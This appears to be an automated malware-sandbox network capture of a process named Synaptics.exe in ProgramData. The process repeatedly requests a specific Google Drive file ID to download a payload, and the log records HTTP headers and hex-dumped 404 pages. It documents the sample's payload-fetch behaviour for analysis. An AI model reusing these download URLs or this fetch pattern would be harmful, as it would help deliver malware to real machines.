                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:25:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 32 37 5a 39 63 4c 75 31 62 71 67 72 77 6c 65 42 43 5a 4d 65 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="a27Z9cLu1bqgrwleBCZMeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:25:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              23192.168.2.849753172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC72KVF_rzGcV1BOzqPIc5yLiZ9x2ybgmT-EA6iY7uwbUVwKHYtsapCg_6v0eX6f-9yAW8hC8Y0
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:28 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-wVVi4nQAcndS3W-7DrWy2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:25:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 56 2d 51 59 54 36 66 4d 5a 61 38 2d 45 47 59 68 6d 66 65 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="FV-QYT6fMZa8-EGYhmfebQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:25:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              24192.168.2.849754216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JK43WesTCta4Zazem5djGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              25192.168.2.849757172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:29 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5rO2k5PgJK2itYWkF34TGGYQ9c1iOcnxYJYoTJy-6kNJ9FHgFB-HGYBi4hTE84CPCh
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-zaRp3pI2J5oDpJcEl7ow0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 61 76 33 51 30 4a 66 61 42 52 35 52 4a 54 76 30 36 41 49 35 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="Eav3Q0JfaBR5RJTv06AI5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              26192.168.2.849756216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bNXsIA1ONP1eclP_GVy1Xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              27192.168.2.849760172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:29 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:29 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4zg4AQd-u56P6ySOM_rnyBmXpvD8v0hAfyJ4s99l9j9G7WaxB4m046OvnFJnB05sA8o3WUfM0
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-NHUZSGUkvtQHnffHXaVdKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:29 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:25:29 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 4b 64 5a 48 4a 6d 57 6e 4d 79 6d 6e 6e 2d 6e 79 56 69 53 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="IKdZHJmWnMymnn-nyViSyg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:25:29 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              28192.168.2.849762216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              29192.168.2.849768216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-vP852-jv0bqtO3F4CjFYKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              30192.168.2.849769216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-g903Fcli61Ga-KbhYKH7EQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
